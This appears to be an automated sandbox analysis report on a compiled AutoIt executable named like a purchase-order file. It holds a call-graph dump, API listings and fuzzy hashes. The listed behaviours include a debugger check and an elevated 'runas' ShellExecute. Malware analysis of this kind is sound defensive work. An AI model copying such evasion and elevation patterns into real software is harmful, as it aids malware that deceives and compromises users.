104220->104222 104223 2dc216 104220->104223 104224 2d7aa0 ___strgtold12_l 8 API calls 104221->104224 104228 2dc1c3 104222->104228 104229 2dc594 GetLastError 104222->104229 104226 2dc30d 104223->104226 104227 2dc22c 104223->104227 104224->104247 104232 2dbf03 GetConsoleMode 104225->104232 104230 2dc318 104226->104230 104231 2dc416 104226->104231 104233 2dc5ce 104227->104233 104237 2dc29c WriteFile 104227->104237 104228->104233 104239 2dc5aa 104228->104239 104228->104247 104229->104228 104230->104233 104245 2dc391 WriteFile 104230->104245 104231->104233 104241 2dc48b WideCharToMultiByte 104231->104241 104232->104220 104236 2dbf3c 104232->104236 104234 2d889e ___strgtold12_l 47 API calls 104233->104234 104233->104247 104238 2dc5f6 104234->104238 104235 2dbf4c GetConsoleCP 104235->104228 104260 2dbf75 104235->104260 104236->104220 104236->104235 104237->104229 104240 2dc2d9 104237->104240 104242 2d886a __lseeki64 47 API calls 104238->104242 104243 2dc5c5 104239->104243 104244 2dc5b1 104239->104244 104240->104227 104240->104228 104246 2dc308 104240->104246 104241->104229 104256 2dc4d2 104241->104256 104242->104247 104249 2d887d __dosmaperr 47 API calls 104243->104249 104248 2d889e ___strgtold12_l 47 API calls 104244->104248 104245->104229 104250 2dc3e0 104245->104250 104246->104228 104247->104204 104252 2dc5b6 104248->104252 104249->104247 104250->104228 104250->104230 104250->104246 104251 2dc4da WriteFile 104253 2dc52d GetLastError 104251->104253 104251->104256 104254 2d886a __lseeki64 47 API calls 104252->104254 104253->104256 104254->104247 104255 2d22a8 __chsize_nolock 57 API calls 104255->104260 104256->104228 104256->104231 104256->104246 104256->104251 104257 2e4ea7 59 API calls __chsize_nolock 104257->104260 104258 2e6634 WriteConsoleW CreateFileW __chsize_nolock 104261 2dc0a9 104258->104261 104259 2dc042 WideCharToMultiByte 104259->104228 104262 2dc07d WriteFile 104259->104262 104260->104228 104260->104255 104260->104257 104260->104259 104260->104261 104261->104228 104261->104229 104261->104258 104261->104260 104263 2dc0d4 WriteFile 104261->104263 104262->104229 104262->104261 104263->104229 104263->104261 104264->104172 104265->104184 104266->104188 104267->104187 104268->104184 104269->104176 104270->104180 104271->104184 104272->104138 104273->104140 104296 2db957 104274->104296 104276 2df8b0 104309 2db8d1 48 API calls 2 library calls 104276->104309 104278 2df85a 104278->104276 104279 2df88e 104278->104279 104280 2db957 __close_nolock 47 API calls 104278->104280 104279->104276 104281 2db957 __close_nolock 47 API calls 104279->104281 104283 2df885 104280->104283 104284 2df89a CloseHandle 104281->104284 104282 2df8b8 104285 2df8da 104282->104285 104310 2d887d 47 API calls 3 library calls 104282->104310 104286 2db957 __close_nolock 47 API calls 104283->104286 104284->104276 104287 2df8a6 GetLastError 104284->104287 104285->104161 104286->104279 104287->104276 104289->104147 104290->104162 104291->104161 104292->104162 104293->104149 104294->104154 104295->104162 104297 2db977 104296->104297 104298 2db962 104296->104298 104300 2d886a __lseeki64 47 API calls 104297->104300 104302 2db99c 104297->104302 104299 2d886a __lseeki64 47 API calls 104298->104299 104301 2db967 104299->104301 104303 2db9a6 104300->104303 104304 2d889e ___strgtold12_l 47 API calls 104301->104304 104302->104278 104306 2d889e ___strgtold12_l 47 API calls 104303->104306 104305 2db96f 104304->104305 104305->104278 104307 2db9ae 104306->104307 104308 2d7aa0 ___strgtold12_l 8 API calls 104307->104308 104308->104305 104309->104282 104310->104285 104311->103737 104312->103743 104313->103740 104314->103750 104315->103757 104316->103759 104317->103756 104318->103764 104319->103769 104320->103784 104321->103782 104323 324aa5 GetFullPathNameW 104322->104323 104324 2b31c7 104322->104324 104326 324abd 104323->104326 104379 2b3bcf 104324->104379 104327 2b31cd GetFullPathNameW 104328 2b31e7 104327->104328 104328->103605 104330 2b3a8b SHGetDesktopFolder 104329->104330 104333 2b3ade 104329->104333 104331 2b3a99 104330->104331 104330->104333 104332 2b3ac8 SHGetPathFromIDListW 104331->104332 104331->104333 104332->104333 104333->103608 104335 2b3ba9 104334->104335 104336 2b3b72 104334->104336 104335->104336 104337 2d1bc7 _W_store_winword 59 API calls 104335->104337 104340 3233e5 104335->104340 104338 2b3bcf 48 API calls 104336->104338 104337->104335 104339 2b3b7d 104338->104339 104383 2b197e 104339->104383 104343 2b197e 48 API calls 104344 2b3b9f 104343->104344 104345 2b3dcb 104344->104345 104346 2b3f9b 136 API calls 104345->104346 104347 2b3def 104346->104347 104348 3239f9 104347->104348 104350 2b3f9b 136 API calls 104347->104350 104349 2fcc82 122 API calls 104348->104349 104351 323a0e 104349->104351 104352 2b3e02 104350->104352 104354 323a12 104351->104354 104355 323a2f 104351->104355 104352->104348 104353 2b3e0a 104352->104353 104356 323a1a 104353->104356 104357 2b3e16 104353->104357 104358 2b3e39 84 API calls 104354->104358 104359 2d010a 48 API calls 104355->104359 104402 2f757b 87 API calls _wprintf 104356->104402 104401 2bbdf0 163 API calls 8 library calls 104357->104401 104358->104356 104362 323a74 Mailbox 104359->104362 104365 323c24 104362->104365 104369 323c35 104362->104369 104376 2bcaee 48 API calls 104362->104376 104389 2f30ac 104362->104389 104392 2bb6d0 104362->104392 104403 2f2fcd 60 API calls 2 library calls 104362->104403 104404 2fa525 48 API calls 104362->104404 104405 2ba870 48 API calls 104362->104405 104363 2b3e2e 104363->103606 104364 323a28 104364->104355 104366 2d28ca _free 47 API calls 104365->104366 104367 323c2c 104366->104367 104368 2b3e39 84 API calls 104367->104368 104368->104369 104373 2d28ca _free 47 API calls 104369->104373 104374 2b3e39 84 API calls 104369->104374 104406 2f32b0 86 API calls 4 library calls 104369->104406 104373->104369 104374->104369 104376->104362 104380 2b3bd9 __wsetenvp 104379->104380 104381 2d010a 48 API calls 104380->104381 104382 2b3bee _wcscpy 104381->104382 104382->104327 104384 2b1990 104383->104384 104388 2b19af _memmove 104383->104388 104387 2d010a 48 API calls 104384->104387 104385 2d010a 48 API calls 104386 2b19c6 104385->104386 104386->104343 104387->104388 104388->104385 104390 2d010a 48 API calls 104389->104390 104391 2f30dc _memmove 104390->104391 104391->104362 104391->104391 104393 2bb789 104392->104393 104400 2bb6e3 _memmove 104392->104400 104395 2d010a 48 API calls 104393->104395 104394 2d010a 48 API calls 104396 2bb6ea 104394->104396 104395->104400 104397 2bb71b 104396->104397 104398 2d010a 48 API calls 104396->104398 104397->104362 104399 2bb74d 104398->104399 104399->104362 104400->104394 104401->104363 104402->104364 104403->104362 104404->104362 104405->104362 104406->104369 104408 2ba72c 104407->104408 104413 2ba848 104407->104413 104409 2d010a 48 API calls 104408->104409 104408->104413 104410 2ba753 104409->104410 104411 2d010a 48 API calls 104410->104411 104412 2ba7c5 104411->104412 104412->104413 104417 2bb6d0 48 API calls 104412->104417 104420 2bace0 91 API calls 2 library calls 104412->104420 104421 2ba870 48 API calls 104412->104421 104422 2fa3ee 48 API calls 104412->104422 104413->103614 104417->104412 104418->103617 104419->103619 104420->104412 104421->104412 104422->104412 104424 2b31a2 LoadImageW 104423->104424 104425 324ad8 EnumResourceNamesW 104423->104425 104426 2b3118 RegisterClassExW 104424->104426 104425->104426 104427 2b2f58 GetSysColorBrush RegisterClassExW RegisterWindowMessageW 104426->104427 104428 2b2fe9 ImageList_Create LoadIconW ImageList_ReplaceIcon 104427->104428 104428->103633 104430 2bea20 104429->104430 104431 2bfa40 346 API calls 104430->104431 104435 2bea89 104430->104435 104433 329919 104431->104433 104432 3299bc 104556 2fd520 86 API calls 4 library calls 104432->104556 104433->104435 104553 2fd520 86 API calls 4 library calls 104433->104553 104437 2beb18 104435->104437 104440 2bd3d2 48 API calls 104435->104440 104451 2becd7 Mailbox 104435->104451 104436 2bfa40 346 API calls 104436->104451 104439 2bd3d2 48 API calls 104437->104439 104437->104451 104441 329997 104439->104441 104442 329963 104440->104442 104555 2d1b2a 52 API calls __cinit 104441->104555 104554 2d1b2a 52 API calls __cinit 104442->104554 104445 2bd380 55 API calls 104445->104451 104447 2bef0c Mailbox 104447->103657 104448 329d70 104565 30e2fb 346 API calls Mailbox 104448->104565 104449 2b342c 48 API calls 104449->104451 104450 329e49 104570 2fd520 86 API calls 4 library calls 104450->104570 104451->104432 104451->104436 104451->104445 104451->104447 104451->104448 104451->104449 104451->104450 104452 329dc2 104451->104452 104453 329ddf 104451->104453 104460 2c14a0 48 API calls 104451->104460 104463 2bf56f 104451->104463 104466 2fd520 86 API calls 104451->104466 104467 329a3c 104451->104467 104552 2bd805 48 API calls _memmove 104451->104552 104557 2fa3ee 48 API calls 104451->104557 104558 30ede9 346 API calls 104451->104558 104563 2ea599 InterlockedDecrement 104451->104563 104564 30f4df 346 API calls 104451->104564 104567 2fd520 86 API calls 4 library calls 104452->104567 104568 30c235 346 API calls Mailbox 104453->104568 104460->104451 104461 329df7 104461->104447 104569 2fd520 86 API calls 4 library calls 104461->104569 104463->104447 104566 2fd520 86 API calls 4 library calls 104463->104566 104466->104451 104559 30d154 48 API calls 104467->104559 104469 329a48 104471 329a56 104469->104471 104472 329a9b 104469->104472 104560 2fa485 48 API calls 104471->104560 104475 329a91 Mailbox 104472->104475 104561 2fafce 48 API calls 104472->104561 104473 2bfa40 346 API calls 104473->104447 104475->104473 104477 329ad8 104562 2cdf08 48 API calls 104477->104562 104480 2c469f 104479->104480 104481 2c4537 104479->104481 104484 2bcaee 48 API calls 104480->104484 104482 327820 104481->104482 104483 2c4543 104481->104483 104619 30e713 346 API calls Mailbox 104482->104619 104618 2c4040 346 API calls _memmove 104483->104618 104491 2c45e4 Mailbox 104484->104491 104487 32782c 104488 2c4639 Mailbox 104487->104488 104620 2fd520 86 API calls 4 library calls 104487->104620 104488->103657 104490 2c4559 104490->104487 104490->104488 104490->104491 104492 2b3e39 84 API calls 104491->104492 104571 3001e4 104491->104571 104612 2cdd84 104491->104612 104615 310c0e 104491->104615 104492->104488 104496->103657 104497->103657 104498->103657 104499->103657 104500->103657 104501->103639 104502->103642 104503->103647 104504->103657 104505->103657 104506->103657 104507->103660 104508->103660 104509->103660 104511 2bfa60 104510->104511 104536 2bfa8e Mailbox _memmove 104510->104536 104513 2d010a 48 API calls 104511->104513 104512 2d1b2a 52 API calls __cinit 104512->104536 104513->104536 104514 2c105e 104852 2bc935 48 API calls 104514->104852 104516 2bd3d2 48 API calls 104516->104536 104519 2c0119 104857 2fd520 86 API calls 4 library calls 104519->104857 104520 2c1063 104856 2fd520 86 API calls 4 library calls 104520->104856 104521 2c0dee 104846 2bd89e 50 API calls Mailbox 104521->104846 104523 2c0dfa 104847 2bd89e 50 API calls Mailbox 104523->104847 104525 32b772 104858 2fd520 86 API calls 4 library calls 104525->104858 104526 2bc935 48 API calls 104526->104536 104530 2c0e83 104533 2bcaee 48 API calls 104530->104533 104532 32b7d2 104534 2c10f1 Mailbox 104533->104534 104854 2fd520 86 API calls 4 library calls 104534->104854 104535 2bfbf1 Mailbox 104535->103657 104536->104512 104536->104514 104536->104516 104536->104519 104536->104520 104536->104521 104536->104523 104536->104525 104536->104526 104536->104530 104536->104534 104536->104535 104539 2c1230 104536->104539 104541 2d010a 48 API calls 104536->104541 104542 2bfa40 346 API calls 104536->104542 104545 2ea599 InterlockedDecrement 104536->104545 104546 32b583 104536->104546 104841 310bfa 104536->104841 104844 2bf6d0 346 API calls 2 library calls 104536->104844 104845 2c1620 59 API calls Mailbox 104536->104845 104848 30ee52 82 API calls 2 library calls 104536->104848 104849 30ef9d 90 API calls Mailbox 104536->104849 104850 2fb020 48 API calls 104536->104850 104851 30e713 346 API calls Mailbox 104536->104851 104539->104535 104855 2fd520 86 API calls 4 library calls 104539->104855 104541->104536 104542->104536 104545->104536 104853 2fd520 86 API calls 4 library calls 104546->104853 104549->103660 104550->103660 104551->103660 104552->104451 104553->104435 104554->104437 104555->104451 104556->104447 104557->104451 104558->104451 104559->104469 104560->104475 104561->104477 104562->104475 104563->104451 104564->104451 104565->104463 104566->104447 104567->104447 104568->104461 104569->104447 104570->104447 104572 300218 104571->104572 104573 30020d 104571->104573 104575 2b84a6 81 API calls 104572->104575 104685 2bcdb4 48 API calls 104573->104685 104577 300232 104575->104577 104576 300366 104576->104488 104577->104576 104578 300254 104577->104578 104579 30033c 104577->104579 104580 2b84a6 81 API calls 104578->104580 104581 2b3f9b 136 API calls 104579->104581 104586 300260 _wcscpy _wcschr 104580->104586 104582 30034d 104581->104582 104583 300362 104582->104583 104584 2b3f9b 136 API calls 104582->104584 104583->104576 104585 2b84a6 81 API calls 104583->104585 104584->104583 104587 30039b 104585->104587 104591 300284 _wcscat _wcscpy 104586->104591 104595 3002b2 _wcscat 104586->104595 104621 2d297d 104587->104621 104589 2b84a6 81 API calls 104590 3002d0 _wcscpy 104589->104590 104686 2f7c0c GetFileAttributesW 104590->104686 104593 2b84a6 81 API calls 104591->104593 104593->104595 104594 3002f0 __wsetenvp 104594->104576 104597 2b84a6 81 API calls 104594->104597 104595->104589 104596 3003bf _wcscat _wcscpy 104600 2b84a6 81 API calls 104596->104600 104598 30031c 104597->104598 104687 2f6b3f 77 API calls 4 library calls 104598->104687 104602 300456 104600->104602 104601 300330 104601->104576 104624 2f7334 104602->104624 104604 300476 104605 2cdd84 3 API calls 104604->104605 104606 300485 104605->104606 104607 2b84a6 81 API calls 104606->104607 104610 3004b6 104606->104610 104608 30049f 104607->104608 104630 2fc890 104608->104630 104611 2b3e39 84 API calls 104610->104611 104611->104576 104750 2cdd92 GetFileAttributesW 104612->104750 104755 30f79f 104615->104755 104617 310c1e 104617->104488 104618->104490 104619->104487 104620->104488 104688 2d29c7 104621->104688 104625 2f7341 _wcschr __ftell_nolock 104624->104625 104626 2d297d __wsplitpath 47 API calls 104625->104626 104629 2f7357 _wcscat _wcscpy 104625->104629 104627 2f7389 104626->104627 104628 2d297d __wsplitpath 47 API calls 104627->104628 104628->104629 104629->104604 104631 2fc89d __ftell_nolock 104630->104631 104632 2d010a 48 API calls 104631->104632 104633 2fc8fa 104632->104633 104634 2b4bce 48 API calls 104633->104634 104635 2fc904 104634->104635 104636 2fc6a0 GetSystemTimeAsFileTime 104635->104636 104637 2fc90f 104636->104637 104638 2b41a7 83 API calls 104637->104638 104639 2fc922 _wcscmp 104638->104639 104640 2fc946 104639->104640 104641 2fc9f3 104639->104641 104642 2fce59 94 API calls 104640->104642 104643 2fce59 94 API calls 104641->104643 104644 2fc94b 104642->104644 104658 2fc9bf _wcscat 104643->104658 104645 2d297d __wsplitpath 47 API calls 104644->104645 104647 2fc9fc 104644->104647 104650 2fc974 _wcscat _wcscpy 104645->104650 104646 2b417d 64 API calls 104648 2fca18 104646->104648 104647->104610 104649 2b417d 64 API calls 104648->104649 104651 2fca28 104649->104651 104653 2d297d __wsplitpath 47 API calls 104650->104653 104652 2b417d 64 API calls 104651->104652 104654 2fca43 104652->104654 104653->104658 104655 2b417d 64 API calls 104654->104655 104656 2fca53 104655->104656 104657 2b417d 64 API calls 104656->104657 104659 2fca6e 104657->104659 104658->104646 104658->104647 104660 2b417d 64 API calls 104659->104660 104661 2fca7e 104660->104661 104662 2b417d 64 API calls 104661->104662 104663 2fca8e 104662->104663 104664 2b417d 64 API calls 104663->104664 104665 2fca9e 104664->104665 104714 2fd009 GetTempPathW GetTempFileNameW 104665->104714 104667 2fcaaa 104668 2d4129 117 API calls 104667->104668 104679 2fcabb 104668->104679 104669 2fcb75 104670 2d4274 __fcloseall 83 API calls 104669->104670 104671 2fcb80 104670->104671 104673 2fcb9a 104671->104673 104674 2fcb86 DeleteFileW 104671->104674 104672 2b417d 64 API calls 104672->104679 104675 2fcc2e CopyFileW 104673->104675 104680 2fcba4 104673->104680 104674->104647 104676 2fcc56 DeleteFileW 104675->104676 104677 2fcc44 DeleteFileW 104675->104677 104728 2fcfc8 CreateFileW 104676->104728 104677->104647 104679->104647 104679->104669 104679->104672 104715 2d373e 104679->104715 104731 2fc251 118 API calls __fcloseall 104680->104731 104683 2fcc19 104683->104676 104684 2fcc1d DeleteFileW 104683->104684 104684->104647 104685->104572 104686->104594 104687->104601 104689 2d29e2 104688->104689 104692 2d29d6 104688->104692 104712 2d889e 47 API calls __getptd_noexit 104689->104712 104691 2d2b9a 104693 2d29c2 104691->104693 104713 2d7aa0 8 API calls ___strgtold12_l 104691->104713 104692->104689 104701 2d2a55 104692->104701 104707 2da9fb 47 API calls ___strgtold12_l 104692->104707 104693->104596 104696 2d2ac2 104697 2d2b21 104696->104697 104698 2d2ae0 104696->104698 104697->104689 104697->104693 104699 2d2b31 104697->104699 104698->104689 104700 2d2afc 104698->104700 104709 2da9fb 47 API calls ___strgtold12_l 104698->104709 104711 2da9fb 47 API calls ___strgtold12_l 104699->104711 104700->104689 104700->104693 104703 2d2b12 104700->104703 104701->104689 104701->104696 104708 2da9fb 47 API calls ___strgtold12_l 104701->104708 104710 2da9fb 47 API calls ___strgtold12_l 104703->104710 104707->104701 104708->104696 104709->104700 104710->104693 104711->104693 104712->104691 104713->104693 104714->104667 104716 2d374a __mtinitlocknum 104715->104716 104717 2d377c 104716->104717 104718 2d3764 104716->104718 104719 2d3774 __mtinitlocknum 104716->104719 104720 2d5a9f __lock_file 48 API calls 104717->104720 104744 2d889e 47 API calls __getptd_noexit 104718->104744 104719->104679 104723 2d3782 104720->104723 104722 2d3769 104745 2d7aa0 8 API calls ___strgtold12_l 104722->104745 104732 2d35e7 104723->104732 104729 2fcfee SetFileTime CloseHandle 104728->104729 104730 2fd004 104728->104730 104729->104730 104730->104647 104731->104683 104733 2d35f6 104732->104733 104738 2d3614 104732->104738 104734 2d3604 104733->104734 104733->104738 104743 2d362c _memmove 104733->104743 104747 2d889e 47 API calls __getptd_noexit 104734->104747 104736 2d3609 104748 2d7aa0 8 API calls ___strgtold12_l 104736->104748 104746 2d37b4 LeaveCriticalSection LeaveCriticalSection __wfsopen 104738->104746 104740 2d3914 __flush 78 API calls 104740->104743 104741 2d35c3 __flush 47 API calls 104741->104743 104742 2dbd14 __flush 78 API calls 104742->104743 104743->104738 104743->104740 104743->104741 104743->104742 104749 2d9af3 78 API calls 6 library calls 104743->104749 104744->104722 104745->104719 104746->104719 104747->104736 104748->104738 104749->104743 104751 2cdd89 104750->104751 104752 324a7d FindFirstFileW 104750->104752 104751->104488 104753 324a95 FindClose 104752->104753 104754 324a8e 104752->104754 104754->104753 104756 2b84a6 81 API calls 104755->104756 104757 30f7db 104756->104757 104758 30f81d Mailbox 104757->104758 104791 310458 104757->104791 104758->104617 104760 30fa7c 104761 30fbeb 104760->104761 104766 30fa86 104760->104766 104827 310579 89 API calls Mailbox 104761->104827 104764 30fbf8 104765 30fc04 104764->104765 104764->104766 104765->104758 104804 30f5fb 104766->104804 104767 2b84a6 81 API calls 104785 30f875 Mailbox 104767->104785 104772 30faba 104818 2cf92c 104772->104818 104775 30fad4 104824 2fd520 86 API calls 4 library calls 104775->104824 104776 30faee 104778 2b3320 48 API calls 104776->104778 104780 30fb05 104778->104780 104779 30fadf GetCurrentProcess TerminateProcess 104779->104776 104781 2c14a0 48 API calls 104780->104781 104790 30fb2f 104780->104790 104783 30fb1e 104781->104783 104782 30fc56 104782->104758 104787 30fc6f FreeLibrary 104782->104787 104825 310300 105 API calls _free 104783->104825 104784 2c14a0 48 API calls 104784->104790 104785->104758 104785->104760 104785->104767 104785->104785 104822 3128d9 48 API calls _memmove 104785->104822 104823 30fc96 60 API calls 2 library calls 104785->104823 104787->104758 104790->104782 104790->104784 104826 2bd89e 50 API calls Mailbox 104790->104826 104828 310300 105 API calls _free 104790->104828 104792 2bb8a7 48 API calls 104791->104792 104793 310473 CharLowerBuffW 104792->104793 104829 30267a 104793->104829 104797 2bd3d2 48 API calls 104798 3104ac 104797->104798 104836 2b7f40 48 API calls _memmove 104798->104836 104800 3104c3 104801 2ba2fb 48 API calls 104800->104801 104802 3104cf Mailbox 104801->104802 104803 31050b Mailbox 104802->104803 104837 30fc96 60 API calls 2 library calls 104802->104837 104803->104785 104805 30f616 104804->104805 104809 30f66b 104804->104809 104806 2d010a 48 API calls 104805->104806 104807 30f638 104806->104807 104808 2d010a 48 API calls 104807->104808 104807->104809 104808->104807 104810 310719 104809->104810 104811 310944 Mailbox 104810->104811 104814 31073c _strcat _wcscpy __wsetenvp 104810->104814 104811->104772 104812 2bd00b 58 API calls 104812->104814 104813 2bcdb4 48 API calls 104813->104814 104814->104811 104814->104812 104814->104813 104815 2b84a6 81 API calls 104814->104815 104816 2d45ec 47 API calls __crtCompareStringA_stat 104814->104816 104840 2f8932 50 API calls __wsetenvp 104814->104840 104815->104814 104816->104814 104819 2cf941 104818->104819 104820 2cf9d9 VirtualAlloc 104819->104820 104821 2cf9a7 104819->104821 104820->104821 104821->104775 104821->104776 104822->104785 104823->104785 104824->104779 104825->104790 104826->104790 104827->104764 104828->104790 104830 3026a4 __wsetenvp 104829->104830 104831 3026e2 104830->104831 104833 3026d8 104830->104833 104834 302763 104830->104834 104831->104797 104831->104802 104833->104831 104838 2cdfd2 60 API calls 104833->104838 104834->104831 104839 2cdfd2 60 API calls 104834->104839 104836->104800 104837->104803 104838->104833 104839->104834 104840->104814 104842 30f79f 129 API calls 104841->104842 104843 310c0a 104842->104843 104843->104536 104844->104536 104845->104536 104846->104523 104847->104530 104848->104536 104849->104536 104850->104536 104851->104536 104852->104535 104853->104534 104854->104535 104855->104520 104856->104519 104857->104525 104858->104532 104859 2fc450 104860 2fc45d 104859->104860 104861 2fc463 104859->104861 104862 2d28ca _free 47 API calls 104860->104862 104863 2d28ca _free 47 API calls 104861->104863 104865 2fc474 104861->104865 104862->104861 104863->104865 104864 2fc486 104865->104864 104866 2d28ca _free 47 API calls 104865->104866 104866->104864 104867 321eed 104872 2ce975 104867->104872 104869 321f01 104888 2d1b2a 52 API calls __cinit 104869->104888 104871 321f0b 104873 2d010a 48 API calls 104872->104873 104874 2cea27 GetModuleFileNameW 104873->104874 104875 2d297d __wsplitpath 47 API calls 104874->104875 104876 2cea5b _wcsncat 104875->104876 104889 2d2bff 104876->104889 104879 2d010a 48 API calls 104880 2cea94 _wcscpy 104879->104880 104881 2bd3d2 48 API calls 104880->104881 104882 2ceacf 104881->104882 104892 2ceb05 104882->104892 104884 2ceae0 Mailbox 104884->104869 104885 2ceada _wcscat __wsetenvp _wcsncpy 104885->104884 104886 2d010a 48 API calls 104885->104886 104887 2ba4f6 48 API calls 104885->104887 104886->104885 104887->104885 104888->104871 104906 2daab9 104889->104906 104918 2bc4cd 104892->104918 104894 2ceb14 RegOpenKeyExW 104895 324b17 RegQueryValueExW 104894->104895 104896 2ceb35 104894->104896 104897 324b30 104895->104897 104898 324b91 RegCloseKey 104895->104898 104896->104885 104899 2d010a 48 API calls 104897->104899 104900 324b49 104899->104900 104901 2b4bce 48 API calls 104900->104901 104902 324b53 RegQueryValueExW 104901->104902 104903 324b6f 104902->104903 104905 324b86 104902->104905 104904 2b7e53 48 API calls 104903->104904 104904->104905 104905->104898 104907 2daaca 104906->104907 104908 2dabc6 104906->104908 104907->104908 104913 2daad5 104907->104913 104916 2d889e 47 API calls __getptd_noexit 104908->104916 104912 2dabbb 104917 2d7aa0 8 API calls ___strgtold12_l 104912->104917 104914 2cea8a 104913->104914 104915 2d889e 47 API calls __getptd_noexit 104913->104915 104914->104879 104915->104912 104916->104912 104917->104914 104919 2bc4da 104918->104919 104920 2bc4e7 104918->104920 104919->104894 104921 2d010a 48 API calls 104920->104921 104921->104919

                        Executed Functions

                        Function 002B374E Relevance: 22.9, APIs: 9, Strings: 4, Instructions: 145windowCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                        • GetCurrentDirectoryW.KERNEL32(00000104,?,00000000,00000001), ref: 002B376D
                          • Part of subcall function 002B4257: GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exe,00000104,?,00000000,00000001,00000000), ref: 002B428C
                        • IsDebuggerPresent.KERNEL32(?,?), ref: 002B377F
                        • GetFullPathNameW.KERNEL32(C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exe,00000104,?,00371120,C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exe,00371124,?,?), ref: 002B37EE
                          • Part of subcall function 002B34F3: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 002B352A
                        • SetCurrentDirectoryW.KERNEL32(?), ref: 002B3860
                        • MessageBoxA.USER32(00000000,This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.,00362934,00000010), ref: 003221C5
                        • SetCurrentDirectoryW.KERNEL32(?,?), ref: 003221FD
                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104,?), ref: 00322232
                        • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,0034DAA4), ref: 00322290
                        • ShellExecuteW.SHELL32(00000000), ref: 00322297
                          • Part of subcall function 002B30A5: GetSysColorBrush.USER32(0000000F), ref: 002B30B0
                          • Part of subcall function 002B30A5: LoadCursorW.USER32(00000000,00007F00), ref: 002B30BF
                          • Part of subcall function 002B30A5: LoadIconW.USER32(00000063), ref: 002B30D5
                          • Part of subcall function 002B30A5: LoadIconW.USER32(000000A4), ref: 002B30E7
                          • Part of subcall function 002B30A5: LoadIconW.USER32(000000A2), ref: 002B30F9
                          • Part of subcall function 002B30A5: RegisterClassExW.USER32(?), ref: 002B3167
                          • Part of subcall function 002B2E9D: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 002B2ECB
                          • Part of subcall function 002B2E9D: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 002B2EEC
                          • Part of subcall function 002B2E9D: ShowWindow.USER32(00000000), ref: 002B2F00
                          • Part of subcall function 002B2E9D: ShowWindow.USER32(00000000), ref: 002B2F09
                          • Part of subcall function 002B3598: _memset.LIBCMT ref: 002B35BE
                          • Part of subcall function 002B3598: Shell_NotifyIconW.SHELL32(00000000,?), ref: 002B3667
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: Window$IconLoadName$CurrentDirectory$CreateFileFullModulePathShow$BrushClassColorCursorDebuggerExecuteForegroundMessageNotifyPresentRegisterShellShell__memset
                        • String ID: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exe$This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.$runas$"7
                        • API String ID: 4253510256-848070753
                        • Opcode ID: d0acf273f4d1e9e142545bb6f8aa9a5f9d89871d197cd5daa812847884e81287
                        • Instruction ID: 4813886144ebfc6195f3b017ef6389dbb83c8f44dd9939880f12130134462127
                        • Opcode Fuzzy Hash: d0acf273f4d1e9e142545bb6f8aa9a5f9d89871d197cd5daa812847884e81287
                        • Instruction Fuzzy Hash: 79515C36614244BBCB23EBB4EC47FEE7B7C9B05790F004056F64596192CB704AA5CF62
                        Function 002DBDF6 Relevance: 21.5, APIs: 14, Instructions: 537COMMONLIBRARYCODE
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 698 2dbdf6-2dbe33 call 2e0650 701 2dbe3c-2dbe3e 698->701 702 2dbe35-2dbe37 698->702 704 2dbe5f-2dbe8c 701->704 705 2dbe40-2dbe5a call 2d886a call 2d889e call 2d7aa0 701->705 703 2dc613-2dc61f call 2db4bf 702->703 706 2dbe8e-2dbe91 704->706 707 2dbe93-2dbe9a 704->707 705->703 706->707 710 2dbebe-2dbec3 706->710 711 2dbe9c-2dbeb3 call 2d886a call 2d889e call 2d7aa0 707->711 712 2dbeb8 707->712 716 2dbec5-2dbecf call 2e05df 710->716 717 2dbed2-2dbee0 call 2e49a2 710->717 747 2dc604-2dc607 711->747 712->710 716->717 728 2dc1fe-2dc210 717->728 729 2dbee6-2dbef8 717->729 732 2dc56b-2dc588 WriteFile 728->732 733 2dc216-2dc226 728->733 729->728 731 2dbefe-2dbf36 call 2d869d GetConsoleMode 729->731 731->728 751 2dbf3c-2dbf42 731->751 739 2dc58a-2dc592 732->739 740 2dc594-2dc59a GetLastError 732->740 736 2dc30d-2dc312 733->736 737 2dc22c-2dc237 733->737 742 2dc318-2dc321 736->742 743 2dc416-2dc421 736->743 745 2dc23d-2dc24d 737->745 746 2dc5ce-2dc5e6 737->746 741 2dc59c 739->741 740->741 748 2dc5a2-2dc5a4 741->748 742->746 749 2dc327 742->749 743->746 755 2dc427 743->755 752 2dc253-2dc256 745->752 753 2dc5e8-2dc5eb 746->753 754 2dc5f1-2dc601 call 2d889e call 2d886a 746->754 750 2dc611-2dc612 747->750 757 2dc609-2dc60f 748->757 758 2dc5a6-2dc5a8 748->758 759 2dc331-2dc348 749->759 750->703 760 2dbf4c-2dbf6f GetConsoleCP 751->760 761 2dbf44-2dbf46 751->761 762 2dc29c-2dc2d3 WriteFile 752->762 763 2dc258-2dc271 752->763 753->754 764 2dc5ed-2dc5ef 753->764 754->747 765 2dc431-2dc446 755->765 